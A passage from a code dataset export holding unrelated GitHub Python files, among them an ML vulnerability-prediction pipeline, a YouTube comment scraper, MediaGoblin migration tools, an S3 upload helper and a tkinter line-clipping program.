data, filename_column = Cleaning().cleaning(data, self.data['Data Cleaning'])\n columns = data.columns\n best_prediction = None\n\n # Validation - Train/Test Split\n if self.data['Validation'] == \"ttsplit\":\n x_training, x_testing, y_training, y_testing = Validation().data_validation(data, self.data['Validation'])\n\n x_training = x_training[:, :-1]\n x_testing = x_testing[:, :-1]\n\n # Feature Scaling\n self.scaler, x_training, x_testing = Scaling().scaling(x_training, x_testing, self.data['Feature Scaling'])\n\n # Feature Selection\n if self.data['Feature Selection'] == \"kbest\":\n self.selector, x_training, x_testing, self.selected_features = Selection().selection(x_training, x_testing,\n columns, y_training, y_testing, self.data['Feature Selection'],\n self.data[\"K\"])\n else:\n self.selector, x_training, x_testing, self.selected_features = Selection().selection(x_training,\n x_testing,\n columns,\n y_training,\n y_testing,\n self.data[\n 'Feature Selection'])\n\n x_training = np.hstack((x_training, y_training.reshape(-1, 1)))\n # Data Balancing\n x_training, y_training, self.balancer = Balancing().dataBalancing(x_training, y_training, self.data['Data Balancing'])\n\n x_training = x_training[:, :-1]\n # Model classification\n self.prediction, self.classifier = Classification().data_classification(x_training, x_testing, y_training,\n self.data['Classifier'])\n\n # Metrics calculation\n print(\"Validation metrics:\")\n Metrics().metrics(y_testing, self.prediction)\n\n if self.selected_features is None:\n self.selected_features = columns.delete(-1)\n\n # Model explanation\n Explainability().explainability(x_training, x_testing, y_testing, self.prediction, self.classifier, self.selected_features,\n self.data['Explanation Method'])\n\n # Validation - Standard or Stratified K Fold Validation\n else:\n indexes, data, labels = Validation().data_validation(data, self.data['Validation'])\n best_accuracy = 0\n best_precision = 0\n best_recall = 0\n best_f1 = 0\n best_mean = 0\n fold = 1\n best_fold = 0\n\n for training_index, testing_index in indexes:\n print(\"\\nFold #\" + str(fold))\n x_training, x_testing = data[training_index], data[testing_index]\n y_training, y_testing = labels[training_index], labels[testing_index]\n\n y_training = np.argmax(y_training, axis=1)\n y_testing = np.argmax(y_testing, axis=1)\n\n x_training = x_training[:, :-1]\n x_testing = x_testing[:, :-1]\n\n # Feature Scaling\n scaler, x_training, x_testing = Scaling().scaling(x_training, x_testing, self.data['Feature Scaling'])\n\n # Feature Selection\n if self.data['Feature Selection'] == \"kbest\":\n selector, x_training, x_testing, selected_features = Selection().selection(x_training,\n x_testing,\n columns,\n y_training,\n y_testing,\n self.data[\n 'Feature Selection'],\n self.data[\"K\"])\n else:\n selector, x_training, x_testing, selected_features = Selection().selection(x_training,\n x_testing,\n columns,\n y_training,\n y_testing,\n self.data[\n 'Feature Selection'])\n\n # Data Balancing\n x_training = np.hstack((x_training, y_training.reshape(-1, 1)))\n x_training, y_training, self.balancer = Balancing().dataBalancing(x_training, y_training, self.data['Data Balancing'])\n x_training = x_training[:, :-1]\n\n # Model classification\n prediction, classifier = Classification().data_classification(x_training, x_testing, y_training, self.data['Classifier'])\n\n\n # Metrics calculation\n accuracy, precision, recall, f1 = Metrics().metrics(y_testing, prediction)\n if (accuracy + precision + recall + f1)/4 > best_mean:\n best_mean = (accuracy + precision + recall + f1)/4\n best_accuracy = accuracy\n best_precision = precision\n best_recall = recall\n best_f1 = f1\n best_fold = fold\n best_prediction = prediction\n self.classifier = classifier\n self.scaler = scaler\n self.selector = selector\n self.prediction = prediction\n self.features_testing = x_testing\n self.testing_labels = y_testing\n self.selected_features = selected_features\n fold += 1\n\n print(\"\\nBest fold: #\" + str(best_fold))\n print(\"Accuracy: \" + \"{:.2%}\".format(float(best_accuracy)))\n print(\"Precision: \" + \"{:.2%}\".format(float(best_precision)))\n print(\"Recall: \" + \"{:.2%}\".format(float(best_recall)))\n print(\"F1: \" + \"{:.2%}\".format(float(best_f1)))\n\n\n # Model explanation\n Explainability().explainability(x_training, self.features_testing, self.testing_labels, self.prediction, self.classifier, self.selected_features,\n self.data['Explanation Method'])\n\n # Saving splitted data, model, preprocessing components and model prediction\n pd.DataFrame(x_training).to_csv(self.dir_path + \"/x_training.csv\")\n pd.DataFrame(y_training).to_csv(self.dir_path + \"/y_training.csv\")\n pd.DataFrame(x_testing).to_csv(self.dir_path + \"/x_testing.csv\")\n pd.DataFrame(y_testing).to_csv(self.dir_path + \"/y_testing.csv\")\n\n pickle.dump(self.scaler, open(self.dir_path + \"/scaler.sav\", 'wb'))\n if self.selector is not None:\n pickle.dump(self.selector, open(self.dir_path + \"/selector.sav\", 'wb'))\n if self.balancer is not None:\n pickle.dump(self.balancer, open(self.dir_path + \"/balancer.sav\", 'wb'))\n pickle.dump(self.classifier, open(self.dir_path + \"/classifier.sav\", 'wb'))\n if best_prediction is not None:\n pd.DataFrame(best_prediction).to_csv(self.dir_path + \"/prediction.csv\")\n else:\n pd.DataFrame(self.prediction).to_csv(self.dir_path + \"/prediction.csv\")\n\n\n # Final prediction on another test set\n print(\"\\n\\nPrediction on input data...\")\n self.dataset_to_predict, prediction_filename_column = Cleaning().cleaning(self.dataset_to_predict, self.data['Data Cleaning'])\n self.dataset_to_predict = self.scaler.fit_transform(self.dataset_to_predict)\n columns_predict = columns[:-1]\n if self.selector is None and self.data['Feature Selection'] != \"default\":\n self.dataset_to_predict = pd.DataFrame(self.dataset_to_predict, columns=columns_predict)\n self.dataset_to_predict = self.dataset_to_predict.loc[:, self.selected_features]\n elif self.data['Feature Selection'] != \"default\":\n self.dataset_to_predict = self.selector.transform(self.dataset_to_predict)\n predictions = self.classifier.predict(self.dataset_to_predict)\n\n # Normalizing 'vulnerable' column and adding it to the dataset\n get_first_char = np.vectorize(lambda x: int(np.floor(x)))\n predictions = get_first_char(predictions)\n complete_dataset = self.dataset_to_predict\n complete_dataset = pd.DataFrame(complete_dataset)\n complete_dataset.insert(len(complete_dataset.columns), \"vulnerable\", predictions)\n\n complete_dataset = complete_dataset.reindex(['filename', *complete_dataset.columns],\n axis=1).assign(filename=prediction_filename_column.to_list())\n complete_dataset.to_csv(self.dir_path + \"/generated_dataset.csv\", index=False)\n\n\n\n\n\n\n\n","repo_name":"CicaMatt/Sentry","sub_path":"dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":11111,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"41274623890","text":"# -*- coding: utf-8 -*-\n\"\"\"\n#based on:\n\n#this code scraps comments from youtube videos and filters out comments with latin characters\n\n#Dec 13 2018\n\"\"\"\n\nimport time\nfrom selenium import webdriver\nfrom contextlib import closing\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport pandas as pd\nlatin_letters = {}\nimport unicodedata as ud\n\nchrome_options = Options() \nchrome_options.add_argument(\"--headless\")\n\ndef get_comments(url,rng=3):\n comments = []\n #read comments \n with closing(webdriver.Chrome(ChromeDriverManager().install())) as driver:\n wait = WebDriverWait(driver,10)\n driver.get(url)\n \n for item in range(rng): #by increasing the highest range you can get more content\n wait.until(EC.visibility_of_element_located((By.TAG_NAME, \"body\"))).send_keys(Keys.END)\n time.sleep(3)\n \n for comment in wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, \"#comment #content-text\"))):\n comments.append(comments.text) \n #return comments as list\n return comments\n\n\ndef run_parser(sources_csv='../data/yt_source.csv', comments_csv='../data/yt_comments.csv'):\n #open source file for url\n yt_source = pd.read_csv(sources_csv)\n yt_comments = pd.read_csv(comments_csv)\n #read comments \n for i, row in yt_source.iterrows():\n if not row.processed:\n comments = get_comments(row.url,13)\n yt_source.set_value(i,'comments_fetched',len(comments))\n yt_source.set_value(i,'processed',1)\n #update comments file\n tmp = pd.DataFrame(comments, columns=['comment'])\n tmp['id'] = row.id\n yt_comments = yt_comments.append(tmp)\n\n #save files\n yt_source.to_csv(sources_csv,index=False)\n yt_comments.to_csv(comments_csv,index=False)\n \ndef filter_latin(comments):\n comments['isLatin'] = [only_roman_chars(thing) for thing in comments.comment]\n filtered = comments.loc[comments.isLatin!=True][['comment','id']]\n return filtered \n\ndef is_latin(uchr):\n try: return latin_letters[uchr]\n except KeyError:\n return latin_letters.setdefault(uchr, 'LATIN' in ud.name(uchr))\n \ndef only_roman_chars(unistr):\n return all(is_latin(uchr) for uchr in unistr if uchr.isalpha())\n ","repo_name":"millzon/wordcloud-am","sub_path":"commentsParser.py","file_name":"commentsParser.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73777510531","text":"from __future__ import unicode_literals\n\nimport logging\nimport os\n\nfrom alembic import command\nfrom alembic.config import Config\nfrom alembic.migration import MigrationContext\n\nfrom mediagoblin.db.base import Base\nfrom mediagoblin.tools.common import simple_printer\nfrom sqlalchemy import Table\nfrom sqlalchemy.sql import select\n\nlog = logging.getLogger(__name__)\n\n\nclass TableAlreadyExists(Exception):\n pass\n\n\nclass AlembicMigrationManager(object):\n\n def __init__(self, session):\n root_dir = os.path.abspath(os.path.dirname(os.path.dirname(\n os.path.dirname(__file__))))\n alembic_cfg_path = os.path.join(root_dir, 'alembic.ini')\n self.alembic_cfg = Config(alembic_cfg_path)\n self.session = session\n\n def get_current_revision(self):\n context = MigrationContext.configure(self.session.bind)\n return context.get_current_revision()\n\n def upgrade(self, version):\n return command.upgrade(self.alembic_cfg, version or 'head')\n\n def downgrade(self, version):\n if isinstance(version, int) or version is None or version.isdigit():\n version = 'base'\n return command.downgrade(self.alembic_cfg, version)\n\n def stamp(self, revision):\n return command.stamp(self.alembic_cfg, revision=revision)\n\n def init_tables(self):\n Base.metadata.create_all(self.session.bind)\n # load the Alembic configuration and generate the\n # version table, \"stamping\" it with the most recent rev:\n # XXX: we need to find a better way to detect current installations\n # using sqlalchemy-migrate because we don't have to create all table\n # for them\n command.stamp(self.alembic_cfg, 'head')\n\n def init_or_migrate(self, version=None):\n # XXX: we need to call this method when we ditch\n # sqlalchemy-migrate entirely\n # if self.get_current_revision() is None:\n # self.init_tables()\n self.upgrade(version)\n\n\nclass MigrationManager(object):\n \"\"\"\n Migration handling tool.\n\n Takes information about a database, lets you update the database\n to the latest migrations, etc.\n \"\"\"\n\n def __init__(self, name, models, foundations, migration_registry, session,\n printer=simple_printer):\n \"\"\"\n Args:\n - name: identifier of this section of the database\n - session: session we're going to migrate\n - migration_registry: where we should find all migrations to\n run\n \"\"\"\n self.name = name\n self.models = models\n self.foundations = foundations\n self.session = session\n self.migration_registry = migration_registry\n self._sorted_migrations = None\n self.printer = printer\n\n # For convenience\n from mediagoblin.db.models import MigrationData\n\n self.migration_model = MigrationData\n self.migration_table = MigrationData.__table__\n\n @property\n def sorted_migrations(self):\n \"\"\"\n Sort migrations if necessary and store in self._sorted_migrations\n \"\"\"\n if not self._sorted_migrations:\n self._sorted_migrations = sorted(\n self.migration_registry.items(),\n # sort on the key... the migration number\n key=lambda migration_tuple: migration_tuple[0])\n\n return self._sorted_migrations\n\n @property\n def migration_data(self):\n \"\"\"\n Get the migration row associated with this object, if any.\n \"\"\"\n return self.session.query(\n self.migration_model).filter_by(name=self.name).first()\n\n @property\n def latest_migration(self):\n \"\"\"\n Return a migration number for the latest migration, or 0 if\n there are no migrations.\n \"\"\"\n if self.sorted_migrations:\n return self.sorted_migrations[-1][0]\n else:\n # If no migrations have been set, we start at 0.\n return 0\n\n @property\n def database_current_migration(self):\n \"\"\"\n Return the current migration in the database.\n \"\"\"\n # If the table doesn't even exist, return None.\n if not self.migration_table.exists(self.session.bind):\n return None\n\n # Also return None if self.migration_data is None.\n if self.migration_data is None:\n return None\n\n return self.migration_data.version\n\n def set_current_migration(self, migration_number=None):\n \"\"\"\n Set the migration in the database to migration_number\n (or, the latest available)\n \"\"\"\n self.migration_data.version = migration_number or self.latest_migration\n self.session.commit()\n\n def migrations_to_run(self):\n \"\"\"\n Get a list of migrations to run still, if any.\n \n Note that this will fail if there's no migration record for\n this class!\n \"\"\"\n assert self.database_current_migration is not None\n\n db_current_migration = self.database_current_migration\n \n return [\n (migration_number, migration_func)\n for migration_number, migration_func in self.sorted_migrations\n if migration_number > db_current_migration]\n\n\n def init_tables(self):\n \"\"\"\n Create all tables relative to this package\n \"\"\"\n # sanity check before we proceed, none of these should be created\n for model in self.models:\n # Maybe in the future just print out a \"Yikes!\" or something?\n if model.__table__.exists(self.session.bind):\n raise TableAlreadyExists(\n u\"Intended to create table '%s' but it already exists\" %\n model.__table__.name)\n\n self.migration_model.metadata.create_all(\n self.session.bind,\n tables=[model.__table__ for model in self.models])\n\n def populate_table_foundations(self):\n \"\"\"\n Create the table foundations (default rows) as layed out in FOUNDATIONS\n in mediagoblin.db.models\n \"\"\"\n for Model, rows in self.foundations.items():\n self.printer(u' + Laying foundations for %s table\\n' % \n (Model.__name__))\n for parameters in rows:\n new_row = Model(**parameters)\n self.session.add(new_row)\n\n def create_new_migration_record(self):\n \"\"\"\n Create a new migration record for this migration set\n \"\"\"\n migration_record = self.migration_model(\n name=self.name,\n version=self.latest_migration)\n self.session.add(migration_record)\n self.session.commit()\n\n def dry_run(self):\n \"\"\"\n Print out a dry run of what we would have upgraded.\n \"\"\"\n if self.database_current_migration is None:\n self.printer(\n u'~> Woulda initialized: %s\\n' % self.name_for_printing())\n return u'inited'\n\n migrations_to_run = self.migrations_to_run()\n if migrations_to_run:\n self.printer(\n u'~> Woulda updated %s:\\n' % self.name_for_printing())\n\n for migration_number, migration_func in migrations_to_run():\n self.printer(\n u' + Would update %s, \"%s\"\\n' % (\n migration_number, migration_func.func_name))\n\n return u'migrated'\n \n def name_for_printing(self):\n if self.name == u'__main__':\n return u\"main mediagoblin tables\"\n else:\n return u'plugin \"%s\"' % self.name\n\n def init_or_migrate(self):\n \"\"\"\n Initialize the database or migrate if appropriate.\n\n Returns information about whether or not we initialized\n ('inited'), migrated ('migrated'), or did nothing (None)\n \"\"\"\n assure_migrations_table_setup(self.session)\n\n # Find out what migration number, if any, this database data is at,\n # and what the latest is.\n migration_number = self.database_current_migration\n\n # Is this our first time? Is there even a table entry for\n # this identifier?\n # If so:\n # - create all tables\n # - create record in migrations registry\n # - print / inform the user\n # - return 'inited'\n if migration_number is None:\n self.printer(u\"-> Initializing %s... \" % self.name_for_printing())\n\n self.init_tables()\n # auto-set at latest migration number\n self.create_new_migration_record()\n self.printer(u\"done.\\n\")\n self.populate_table_foundations()\n self.set_current_migration()\n return u'inited'\n\n # Run migrations, if appropriate.\n migrations_to_run = self.migrations_to_run()\n if migrations_to_run:\n self.printer(\n u'-> Updating %s:\\n' % self.name_for_printing())\n for migration_number, migration_func in migrations_to_run:\n self.printer(\n u' + Running migration %s, \"%s\"... ' % (\n migration_number, migration_func.__name__))\n migration_func(self.session)\n self.set_current_migration(migration_number)\n self.printer('done.\\n')\n\n return u'migrated'\n\n # Otherwise return None. Well it would do this anyway, but\n # for clarity... ;)\n return None\n\n\nclass RegisterMigration(object):\n \"\"\"\n Tool for registering migrations\n\n Call like:\n\n @RegisterMigration(33)\n def update_dwarves(database):\n [...]\n\n This will register your migration with the default migration\n registry. Alternately, to specify a very specific\n migration_registry, you can pass in that as the second argument.\n\n Note, the number of your migration should NEVER be 0 or less than\n 0. 0 is the default \"no migrations\" state!\n \"\"\"\n def __init__(self, migration_number, migration_registry):\n assert migration_number > 0, \"Migration number must be > 0!\"\n assert migration_number not in migration_registry, \\\n \"Duplicate migration numbers detected! That's not allowed!\"\n\n self.migration_number = migration_number\n self.migration_registry = migration_registry\n\n def __call__(self, migration):\n self.migration_registry[self.migration_number] = migration\n return migration\n\n\ndef assure_migrations_table_setup(db):\n \"\"\"\n Make sure the migrations table is set up in the database.\n \"\"\"\n from mediagoblin.db.models import MigrationData\n\n if not MigrationData.__table__.exists(db.bind):\n MigrationData.metadata.create_all(\n db.bind, tables=[MigrationData.__table__])\n\n\ndef inspect_table(metadata, table_name):\n \"\"\"Simple helper to get a ref to an already existing table\"\"\"\n return Table(table_name, metadata, autoload=True,\n autoload_with=metadata.bind)\n\ndef replace_table_hack(db, old_table, replacement_table):\n \"\"\"\n A function to fully replace a current table with a new one for migrati-\n -ons. This is necessary because some changes are made tricky in some situa-\n -tion, for example, dropping a boolean column in sqlite is impossible w/o\n this method\n\n :param old_table A ref to the old table, gotten through \n inspect_table\n\n :param replacement_table A ref to the new table, gotten through\n inspect_table\n\n Users are encouraged to sqlalchemy-migrate replace table solutions, unless\n that is not possible... in which case, this solution works,\n at least for sqlite.\n \"\"\"\n surviving_columns = replacement_table.columns.keys()\n old_table_name = old_table.name\n for row in db.execute(select(\n [column for column in old_table.columns\n if column.name in surviving_columns])):\n\n db.execute(replacement_table.insert().values(**row))\n db.commit()\n\n old_table.drop()\n db.commit()\n\n replacement_table.rename(old_table_name)\n db.commit()\n","repo_name":"jparyani/mediagoblin","sub_path":"mediagoblin/db/migration_tools.py","file_name":"migration_tools.py","file_ext":"py","file_size_in_byte":12141,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"44"} +{"seq_id":"14606421362","text":"class Rectangle:\r\n def __init__ (self,color=\"green\", width=100,height=100, change = 0):\r\n self.color = color\r\n self.width = width\r\n self.height = height\r\n self.change = change\r\n def square(self):\r\n return self.width *self.height\r\n def setchange(self,number):\r\n self.change = number\r\n print(self.change)\r\nrect1 = Rectangle()\r\nprint(rect1.color)\r\nprint(rect1.square())\r\nrect1 = Rectangle(\"yellow\",23,34)\r\nprint(rect1.color)\r\nprint(rect1.square())\r\nprint(\"-----------------------------------\")\r\nprint(rect1.change)\r\nrect1.setchange(5) \r\n","repo_name":"sobakaubivakaa/5classes","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25666189498","text":"\"\"\"S3 helper using Boto3.\"\"\"\n\nimport boto3\nfrom flask import current_app\n\n\ndef upload_file_to_s3(image, fileStoreObj, acl=\"public-read\"):\n \"\"\"S3 file uploader.\"\"\"\n app = current_app._get_current_object()\n\n s3 = boto3.client(\n \"s3\",\n aws_access_key_id=app.config['S3_KEY'],\n aws_secret_access_key=app.config['S3_SECRET']\n )\n\n try:\n s3.put_object(Body=image,\n Bucket=app.config['S3_BUCKET'],\n ACL=acl,\n ContentType=fileStoreObj.content_type,\n Key=fileStoreObj.filename)\n\n except Exception as e:\n print(\"An Error occurred: \", e)\n return e\n return \"{}{}\".format(app.config[\"S3_LOCATION\"],\n fileStoreObj.filename)\n","repo_name":"SchlachterSchmidt/stationary-octo-engine","sub_path":"app/helpers/s3_helper.py","file_name":"s3_helper.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12664687733","text":"from pkgcore.pkgsets import installed\nfrom pkgcore.repository.util import SimpleTree\nfrom pkgcore.test import TestCase\n\n\nclass FakePkg(object):\n\n package_is_real = True\n\n def __init__(self, *key):\n self.key = key\n\n @property\n def slotted_atom(self):\n return \"%s/%s\" % self.key[:2]\n\n @property\n def versioned_atom(self):\n return '%s/%s-%s' % self.key\n\n\nclass TestInstalled(TestCase):\n\n def test_iter(self):\n fake_vdb = SimpleTree({\"dev-util\": {\"diffball\":[\"1.0\"],\n \"bsdiff\":[\"1.2\", \"1.3\"]}}, pkg_klass=FakePkg)\n ipkgset = installed.Installed([fake_vdb])\n self.assertEqual(sorted([\"dev-util/diffball\",\n \"dev-util/bsdiff\", \"dev-util/bsdiff\"]),\n sorted(ipkgset))\n vpkgset = installed.VersionedInstalled([fake_vdb])\n self.assertEqual(sorted([\"dev-util/diffball-1.0\",\n \"dev-util/bsdiff-1.2\", \"dev-util/bsdiff-1.3\"]),\n sorted(vpkgset))\n","repo_name":"pombreda/pkgcore","sub_path":"pkgcore/test/pkgsets/test_installed.py","file_name":"test_installed.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27501640968","text":"from clase_manejafacultad import *\r\nif __name__ == '__main__':\r\n\tmanejador=ManejaFacultades()\r\n\tmanejador.leerArchivo()\r\n\topc=None\r\n\twhile(opc!=0):\r\n\t\tprint('\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t---MENU DE OPCIONES---')\r\n\t\tprint('1. Ingresar el código de una facultad y mostrar nombre de la facultad, nombre y duración de cada una de las carreras que se dictan en esa facultad.')\r\n\t\tprint('2. Dado el nombre de una carrera, mostrar código (se conforma con número de código de Facultad y código de carrera), nombre y localidad de la facultad donde esta se dicta.')\r\n\t\tprint('0. Terminar y cerrar programa.\\n\\n\\t\\t\\t')\r\n\t\topc=int(input('Ingrese opcion: '))\r\n\r\n\t\tif opc==1:\r\n\t\t\tcodigo=input('Ingrese codigo de facultad:\\n')\r\n\t\t\tmanejador.mostrar(codigo)\r\n\t\telif opc==2:\r\n\t\t\tnombre=input('Ingrese nombre de la carrera\\n')\r\n\t\t\tmanejador.recorreFac(nombre)\r\nprint('adiosito vuelva pronto<3')","repo_name":"melibul/POO-Unidad-3-","sub_path":"Ejercicio 1/main_ejercicio1.py","file_name":"main_ejercicio1.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38267809225","text":"import traceback\n\n\nclass Error:\n \"\"\"\n Error is the error data wrapper use to upload errors to the error server\n \"\"\"\n\n def __init__(self, error: Exception, title: str, timestamp: float, metrics_id: str):\n self.error: Exception = error\n self.title: str = str(title)\n self.first_timestamp: float = timestamp\n self.last_timestamp: float = timestamp\n self.count: int = 1\n self.metrics_id: str = metrics_id\n self.type: str = self.error.__class__.__name__ if self.error else \"\"\n self.stacktrace: list = traceback.format_exception(\n type(self.error), value=self.error, tb=self.error.__traceback__\n )[1:] if self.error and isinstance(self.error, Exception) else []\n\n def to_dict(self) -> dict:\n \"\"\"\n Return the dict serialization of self\n \"\"\"\n return {\n \"title\": self.title,\n \"type\": self.type,\n \"stacktrace\": self.stacktrace,\n \"firsttimestamp\": self.first_timestamp,\n \"lasttimestamp\": self.last_timestamp,\n \"count\": self.count,\n \"metricsid\": self.metrics_id,\n }\n\n def is_equivalent(self, other) -> bool:\n return (self.error is other.error or\n (type(self.error) is type(other.error)\n and self.error.args == other.error.args)) and \\\n self.title == other.title and \\\n self.metrics_id == other.metrics_id and \\\n self.type == other.type and \\\n self.stacktrace == other.stacktrace\n\n def merge_equivalent(self, other):\n self.count += other.count\n if other.last_timestamp > self.last_timestamp:\n self.last_timestamp = other.last_timestamp\n","repo_name":"Drakkar-Software/OctoBot","sub_path":"octobot/community/errors_upload/error_model.py","file_name":"error_model.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":2434,"dataset":"github-code","pt":"44"} +{"seq_id":"16219299549","text":"from tkinter import Tk, Button, Label, Entry, END, Listbox, Canvas, Radiobutton, LEFT, RIGHT, IntVar, PhotoImage\nfrom tkinter import messagebox\nfrom math import sqrt, acos, degrees, pi, sin, cos, radians, floor, fabs\nimport copy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom time import time, sleep\n\nimport colorutils as cu\n\n\nWIN_WIDTH = 1500\nWIN_HEIGHT = 900\nWIN_COLOR = \"#bf80ff\"\n\nCV_WIDE = 900\nCV_HEIGHT = 900\nCV_COLOR = \"#ffffff\" #f3e6ff\" #\"#cce6ff\"\nMAIN_TEXT_COLOR = \"#b566ff\" #\"lightblue\" a94dff\nTEXT_COLOR = \"#ce99ff\"\n\nTEMP_SIDE_COLOR_CHECK = (255, 0, 255) # purple\nTEMP_SIDE_COLOR = \"#ff00ff\"\n\nBOX_COLOR = \"#dab3ff\"\n\nCOLOR_LINE = \"#000002\" #(0, 0, 0) # black\nCOLOR_LINE_CHECK = (0, 0, 2)\n\nFILL_COLOR = \"#ff6e41\"\n\n# Define\n\nX_MIN = 0\nX_MAX = 1\nY_MIN = 2\nY_MAX = 3\n\nX_DOT = 0\nY_DOT = 1\n\n# For rectangle\nis_set_rect = False\n\n\ndef check_option(option):\n messagebox.showinfo(\"Выбран\", \"Выбрана опция %d\" %(option))\n\n\ndef clear_canvas():\n canvas_win.delete(\"all\")\n\n\ndef get_fill_check_color(collor_fill):\n return (int(collor_fill[1:3], 16), int(collor_fill[3:5], 16), int(collor_fill[5:7], 16))\n\n\ndef reboot_prog():\n global lines\n global rect\n\n canvas_win.delete(\"all\")\n\n lines = [[]]\n rect = [-1, -1, -1, -1]\n\n\ndef parse_color(num_color):\n color = \"orange\"\n\n if (num_color == 1):\n color = \"#ff6e41\" #\"orange\"\n elif (num_color == 2):\n color = \"#ff5733\" #\"red\"\n elif (num_color == 3):\n color = \"#0055ff\" #\"blue\"\n elif (num_color == 4):\n color = \"#45ff00\" #\"green\"\n\n return color\n\n\ndef add_rect_click1(event):\n global is_set_rect\n\n is_set_rect = False\n\n\ndef add_rect_click(event):\n global rect\n global is_set_rect\n\n cutter_color = parse_color(option_color_cutter.get())\n\n if (is_set_rect == False):\n rect[X_MIN] = event.x\n rect[Y_MAX] = event.y\n\n is_set_rect = True\n else:\n x_first = rect[X_MIN]\n y_first = rect[Y_MAX]\n\n x = event.x\n y = event.y\n\n #canvas_win.create_rectangle(x_first, y_first, x_old, y_old, outline = \"white\")\n canvas_win.delete(\"all\")\n canvas_win.create_rectangle(x_first, y_first, x, y, outline = cutter_color)\n\n rect[X_MAX] = x\n rect[Y_MIN] = y\n\n draw_lines()\n\n \ndef add_rect():\n global rect\n\n try:\n x_min = int(xleft_cutter_entry.get())\n y_max = int(yleft_cutter_entry.get())\n x_max = int(xright_cutter_entry.get())\n y_min = int(yright_cutter_entry.get())\n except:\n messagebox.showinfo(\"Ошибка\", \"Неверно введены координаты\")\n return\n\n cutter_color = parse_color(option_color_cutter.get())\n\n canvas_win.delete(\"all\")\n canvas_win.create_rectangle(x_min, y_max, x_max, y_min, outline = cutter_color)\n\n rect = [x_min, x_max, y_min, y_max]\n\n draw_lines()\n\n\ndef draw_lines():\n\n for line in lines:\n if (len(line) != 0):\n x1 = line[0][0]\n y1 = line[0][1]\n\n x2 = line[1][0]\n y2 = line[1][1]\n\n color_line = line[2]\n\n #bresenham_int([x1, y1], [x2, y2], line_color)\n\n canvas_win.create_line(x1, y1, x2, y2, fill = color_line)\n\n\ndef add_vert_horiz_lines():\n global lines\n global rect\n\n if (rect[0] == -1):\n messagebox.showerror(\"Ошибка\", \"Отсекатель не задан\")\n return\n\n line_color = parse_color(option_color_line.get())\n\n x1 = rect[X_MIN]\n y1 = rect[Y_MAX]\n x2 = rect[X_MAX]\n y2 = rect[Y_MIN]\n\n dy = y2 - y1\n dx = x2 - x1\n\n lines.append([[x1, y1 + 0.1 * dy], [x1, y2 - 0.1 * dy], line_color]) # vertical line on cutter\n lines.append([[x1 + 0.1 * dx, y1], [x2 - 0.1 * dx, y1], line_color]) # horizontal line on cutter\n\n canvas_win.create_line(x1, y1 + 0.1 * dy, x1, y2 - 0.1 * dy, fill = line_color)\n canvas_win.create_line(x1 + 0.1 * dx, y1, x2 - 0.1 * dx, y1, fill = line_color)\n\n lines.append(list())\n\n\ndef add_line_click(event):\n\n line_color = parse_color(option_color_line.get())\n \n x = event.x\n y = event.y\n\n cur_line = len(lines) - 1\n\n if (len(lines[cur_line]) == 0):\n lines[cur_line].append([x, y])\n else:\n lines[cur_line].append([x, y])\n lines[cur_line].append(line_color)\n lines.append(list())\n\n x1 = lines[cur_line][0][0]\n y1 = lines[cur_line][0][1]\n\n x2 = lines[cur_line][1][0]\n y2 = lines[cur_line][1][1]\n\n canvas_win.create_line(x1, y1, x2, y2, fill = line_color)\n\n\ndef add_line():\n global lines\n\n try:\n x1 = int(x_start_line_entry.get())\n y1 = int(y_start_line_entry.get())\n x2 = int(x_end_line_entry.get())\n y2 = int(y_end_line_entry.get())\n except:\n messagebox.showinfo(\"Ошибка\", \"Неверно введены координаты\")\n return\n\n cur_line = len(lines) - 1\n line_color = parse_color(option_color_line.get())\n\n lines[cur_line].append([x1, y1])\n lines[cur_line].append([x2, y2])\n lines[cur_line].append(line_color)\n\n lines.append(list())\n \n canvas_win.create_line(x1, y1, x2, y2, fill = line_color)\n\n\n# Algorithm\n\ndef get_dot_bits(rect, dot):\n bits = 0b0000\n\n #print(rect, dot)\n\n if (dot[X_DOT] < rect[X_MIN]):\n bits += 0b0001\n\n if (dot[X_DOT] > rect[X_MAX]):\n bits += 0b0010\n \n if (dot[Y_DOT] > rect[Y_MIN]): # из-за экранной системы координат поменены\n bits += 0b0100\n \n if (dot[Y_DOT] < rect[Y_MAX]): # из-за экранной системы координат поменены\n bits += 0b1000\n\n return bits\n\n\ndef check_visible(dot1_bits, dot2_bits):\n\n vision = 0 # частично видимый\n\n if (dot1_bits == 0 and dot2_bits == 0):\n vision = 1 # видим\n elif (dot1_bits & dot2_bits):\n vision = -1 # не видим\n\n return vision\n\n\ndef get_bit(dot_bits, i):\n return (dot_bits >> i) & 1\n\n\ndef are_bits_equal(dot1_bits, dot2_bits, i):\n\n if get_bit(dot1_bits, i) == get_bit(dot2_bits, i):\n return True\n\n return False\n\n\ndef method_sazerland_kohen(rect, line):\n dot1 = [line[0][X_DOT], line[0][Y_DOT]]\n dot2 = [line[1][X_DOT], line[1][Y_DOT]]\n\n fl = 0\n\n if (dot1[X_DOT] == dot2[X_DOT]):\n fl = -1 # вертикальный\n else:\n m = (dot2[Y_DOT] - dot1[Y_DOT]) / (dot2[X_DOT] - dot1[X_DOT])\n\n if (m == 0):\n fl = 1 # 